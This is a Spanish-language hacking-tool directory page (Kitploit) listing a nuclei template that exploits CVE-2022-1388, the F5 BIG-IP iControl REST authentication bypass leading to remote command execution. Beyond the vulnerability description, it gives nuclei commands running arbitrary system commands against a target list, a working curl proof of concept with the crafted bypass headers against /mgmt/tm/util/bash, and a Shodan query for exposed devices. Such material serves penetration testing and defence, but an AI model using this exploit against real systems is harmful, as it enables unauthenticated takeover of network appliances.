Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Nuclei-Template-Exploit-F5-BIG-IP-iControl-REST-Auth-Bypass-RCE-Command-Parameter — CVE-2022-1388 es una vulnerabilidad de omisión de autenticación en el componente REST de la API iControl de BIG-IP, a la que se le asignó una puntuación CVSSv3 de 9.8. La API REST de iControl se utiliza para la gestión y configuración de dispositivos BIG-IP. CVE-2022-1388 podría ser explotada por un atacante no autenticado con acceso de red al puerto de gestión o a las direcciones IP propias de los dispositivos que utilizan BIG-IP. La explotación permitiría al atacante ejecutar comandos arbitrarios del sistema, crear y eliminar archivos y deshabilitar servicios. | Kitploit
Herramientas/GitHubGitHub/mrcl0wnlab/nuclei-template-exploit-f5-big-ip-icontrol-rest-auth-bypass-rce-command-parameter
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubmrcl0wnlab/nuclei-template-exploit-f5-big-ip-icontrol-rest-auth-bypass-rce-command-parameter

Nuclei-Template-Exploit-F5-BIG-IP-iControl-REST-Auth-Bypass-RCE-Command-Parameter

Ver Repositorio
62hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

CVE-2022-1388 es una vulnerabilidad de omisión de autenticación en el componente REST de la API iControl de BIG-IP, a la que se le asignó una puntuación CVSSv3 de 9.8. La API REST de iControl se utiliza para la gestión y configuración de dispositivos BIG-IP. CVE-2022-1388 podría ser explotada por un atacante no autenticado con acceso de red al puerto de gestión o a las direcciones IP propias de los dispositivos que utilizan BIG-IP. La explotación permitiría al atacante ejecutar comandos arbitrarios del sistema, crear y eliminar archivos y deshabilitar servicios.

Compartir

Nuclei Template Exploit F5 BIG-IP iControl REST Omisión de Autenticación RCE | Parámetro de Comando

CVE-2022-1388 es una vulnerabilidad de omisión de autenticación en el componente REST de la API iControl de BIG-IP que recibió una puntuación CVSSv3 de 9.8. La API REST de iControl se utiliza para la gestión y configuración de dispositivos BIG-IP. CVE-2022-1388 podría ser explotada por un atacante no autenticado con acceso de red al puerto de gestión o direcciones IP propias de los dispositivos que utilizan BIG-IP. La explotación permitiría al atacante ejecutar comandos arbitrarios del sistema, crear y eliminar archivos y deshabilitar servicios.

Esta plantilla utiliza token-spray / la variable CLI de nuclei

Esta plantilla de nuclei acepta parámetros de shell para la explotación. Queríamos probar tokens obtenidos de otro flujo de trabajo o de una búsqueda manual, por lo que utilizamos la función de variable CLI de nuclei para alimentar dinámicamente un solo valor de token o una lista de tokens en estas plantillas en tiempo de ejecución.

-V, -var value variables personalizadas en formato var=valor

root@kitploit:~
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=commands.txt
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=uname -a

Captura de tela de 2022-05-10 01-28-12

PoC Manual

root@kitploit:~
curl -su admin \ 
-H "Host: localhost:8100" \ 
-H "Content-Type: application/json" \ 
-H "Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a" \ 
-H "Authorization: Basic YWRtaW46" \
 http://{{TARGET_IP}}/mgmt/tm/util/bash \
-d '{"command":"run","utilCmdArgs":"-c id"}'

Detalles Adicionales

  • https://www.shodan.io/search?query=http.title%3A%22BIG-IP%26reg%3B-+Redirect%22

Referencias

  • https://blog.projectdiscovery.io/nuclei-v2-5-release/
  • https://clouddocs.f5.com/products/big-iq/mgmt-api/v5.4/ApiReferences/bigiq_api_ref/r_auth_login.html
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
  • https://github.com/alt3kx/CVE-2022-1388_PoC
  • https://github.com/dorkerdevil/CVE-2021-22986-Poc/blob/main/README.md
  • https://github.com/horizon3ai/CVE-2022-1388/blob/main/CVE-2022-1388.py
  • https://github.com/numanturle/CVE-2022-1388/blob/main/bigip-icontrol-rest-rce.y
  • https://github.com/tenable/audit_files/tree/master/cve-2022-1388
  • https://support.f5.com/csp/article/K23605346
  • https://thehackernews.com/2022/05/f5-warns-of-new-critical-big-ip-remote.html
  • https://twitter.com/1ZRR4H/status/1522165718975922178
  • https://www.tenable.com/blog/cve-2022-1388-authentication-bypass-in-f5-big-ip-aml
Descargar herramienta